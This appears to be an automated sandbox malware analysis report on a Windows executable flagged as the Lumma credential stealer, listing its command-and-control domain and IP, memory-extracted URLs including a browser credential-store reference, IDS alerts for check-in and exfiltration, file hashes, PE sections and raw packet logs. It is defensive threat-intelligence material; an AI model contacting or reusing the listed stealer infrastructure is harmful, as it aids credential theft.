                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://property-imper.sbs:443/apiKfile.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://property-imper.sbs/apiH#file.exe, 00000000.00000003.2283650767.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284187170.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.mozilla.orfile.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://property-imper.sbs/4mfile.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://property-imper.sbs:443/api.default-release/key4.dbPKfile.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.33.116
                                                                    		property-imper.sbsUnited States
                                                                    		13335CLOUDFLARENETUSfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1561463
                                                                    Start date and time:2024-11-23 13:56:40 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 32s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:4
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target file.exe, PID 4392 because there are no executed function
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: file.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    07:57:33API Interceptor8x Sleep call for process: file.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.33.116file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                              Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        property-imper.sbsfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 172.66.0.235
                                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.88.250
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.67.179
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.20.178
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.162.84
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.88.250

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.116
                                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.116
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.33.116
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.116
                                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.33.116

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        No created / dropped files found

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.949133574214009
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:1'852'416 bytes
                                                                                        MD5:44eb876d74e66bc5879d4ac1b636eaf1
                                                                                        SHA1:614cc57507b70108e366e88e296db7c9c10f029e
                                                                                        SHA256:e8030c08981ae2cccfda22cbfd18ede9d1e1e51495ece00ccae6f8ebcad1c6f0
                                                                                        SHA512:ecc0a9a433a72be0b9195fea4dbf46e7f38cb8e6b3854838ffe52dd48162211086c5a4e0c09e8ae023701a7401ab205646d71485cf22558dc3289a38aeb82b92
                                                                                        SSDEEP:24576:Fxb6hdlLUKaSMpKAt77VF1mlSD4/bYkHi0U4qoDZ+91DjIVU3IRty8gAq5U:30dlLUKBAt77NmZ/H2PV3X3Kgn
                                                                                        TLSH:F185330CADA3B9EBDBA227F5C5DDB90C2D510AD46F0EADE0792F17B7104326B7188491
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I......9....@.................................\...p..

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x897000
                                                                                        Entrypoint Section:.taggant
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp 00007F1740FA5C2Ah

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        0x10000x560000x26200e9a881afee02a61de7d9201c039d504fFalse0.9993084016393443data7.977505472489843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x570000x2b00x200f88ccc15c78bbe7457275cabb99f6a2bFalse0.794921875data6.0106497060946245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        0x590000x2a20000x20095607a2000bb0439d9a8562ccdcd1b00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        prornizb0x2fb0000x19b0000x19a60099d109745ce9c15b89c9e83ea688ae17False0.9944696162046909data7.953536728834796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        bkfftptq0x4960000x10000x400c5b803c89b448bdfea155cb3c8261e32False0.7412109375data5.876294864003438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .taggant0x4970000x30000x22008b6b3f6f53b519ccde4e41e8beff6f66False0.062270220588235295DOS executable (COM)0.7527862358768012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x4951cc0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                        Imports

                                                                                        DLLImport
                                                                                        kernel32.dlllstrcpy

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-23T13:57:33.993626+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707104.21.33.116443TCP
                                                                                        2024-11-23T13:57:34.672720+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707104.21.33.116443TCP
                                                                                        2024-11-23T13:57:34.672720+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707104.21.33.116443TCP
                                                                                        2024-11-23T13:57:35.979561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708104.21.33.116443TCP
                                                                                        2024-11-23T13:57:36.672012+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649708104.21.33.116443TCP
                                                                                        2024-11-23T13:57:36.672012+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649708104.21.33.116443TCP
                                                                                        2024-11-23T13:57:38.191607+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.33.116443TCP
                                                                                        2024-11-23T13:57:40.446583+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.33.116443TCP
                                                                                        2024-11-23T13:57:42.848399+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.33.116443TCP
                                                                                        2024-11-23T13:57:45.639772+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720104.21.33.116443TCP
                                                                                        2024-11-23T13:57:46.236579+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649720104.21.33.116443TCP
                                                                                        2024-11-23T13:57:48.020217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649729104.21.33.116443TCP
                                                                                        2024-11-23T13:57:52.147862+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649745104.21.33.116443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 23, 2024 13:57:32.644519091 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:32.644566059 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:32.644634962 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:32.754705906 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:32.754748106 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:33.993549109 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:33.993626118 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:33.997312069 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:33.997323036 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:33.997674942 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.038070917 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.050606012 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.050640106 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.050693989 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.672657967 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.672720909 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.672786951 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.674834967 CET49707443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.674855947 CET44349707104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.766673088 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.766750097 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:34.766829967 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.767155886 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:34.767189980 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:35.979470968 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:35.979561090 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:35.985419035 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:35.985450029 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:35.985692978 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:35.990197897 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:35.990247965 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:35.990283012 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.671981096 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.672015905 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.672040939 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.672070980 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.672068119 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.672136068 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.672179937 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.680421114 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.680438995 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.680504084 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.680521011 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.680579901 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.688685894 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.697180033 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.697232008 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.697247982 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.741236925 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.793241024 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.834961891 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.834999084 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.863951921 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.863985062 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.864053011 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.864135027 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.864398956 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.864445925 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.864476919 CET49708443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.864495039 CET44349708104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.978291035 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.978336096 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:36.978415012 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.978760004 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:36.978792906 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:38.191528082 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:38.191606998 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:38.193242073 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:38.193255901 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:38.193466902 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:38.198131084 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:38.198286057 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:38.198327065 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:39.036451101 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:39.036514044 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:39.036572933 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:39.036694050 CET49710443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:39.036724091 CET44349710104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:39.185054064 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:39.185100079 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:39.185169935 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:39.185483932 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:39.185501099 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:40.446523905 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:40.446583033 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:40.447884083 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:40.447890997 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:40.448209047 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:40.449831009 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:40.449982882 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:40.450020075 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:40.450073004 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:40.491374016 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:41.388577938 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:41.388681889 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:41.388735056 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:41.388870001 CET49712443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:41.388890982 CET44349712104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:41.588474989 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:41.588509083 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:41.588584900 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:41.588927984 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:41.588944912 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:42.848155022 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:42.848398924 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:42.849641085 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:42.849658012 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:42.849982023 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:42.851331949 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:42.851470947 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:42.851511955 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:42.851574898 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:42.851584911 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:43.726461887 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:43.726545095 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:43.726629972 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:43.726730108 CET49713443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:43.726742983 CET44349713104.21.33.116192.168.2.6
                                                                                        Nov 23, 2024 13:57:44.366535902 CET49720443192.168.2.6104.21.33.116
                                                                                        Nov 23, 2024 13:57:44.366592884 CET44349720104.21.33.116192.168.2.6
